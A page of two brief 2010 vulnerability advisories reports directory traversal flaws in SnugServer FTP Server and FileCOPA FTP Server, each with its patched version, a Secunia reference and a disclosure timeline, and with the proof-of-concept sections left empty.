Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in SnugServer FTP Server. This issue was discovered in a default installation of SnugServer FTP Server 4.3.0.126. Other earlier versions may also be affected.

Proof of concept



Solution
Update to version 4.3.0.134 or later.

Reference
Secunia: http://secunia.com/advisories/39866/

Disclosure Timeline
2010-05-20 - Vulnerability discovered.
2010-05-20 - Vulnerability reported to Secunia.
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.
2010-05-21 - Patch released.
2010-05-21 - Advisory published by Secunia.

Read More

FileCOPA FTP Server 5.02 Directory Traversal Vulnerability

Description
FileCOPA is a commercial FTP server for Windows that is available as shareware.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in FileCOPA FTP Server. This issue was discovered in a default installation of FileCOPA FTP Server 5.02. Other earlier versions may also be affected.

Proof of concept



Solution
Update to version 5.03 or later.

Reference
Secunia: http://secunia.com/advisories/39843/

Disclosure Timeline
2010-05-19 - Vulnerability discovered.
2010-05-19 - Vulnerability reported to Secunia.
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.
2010-05-21 - Patch released.
2010-05-21 - Advisory published by Secunia.

Read More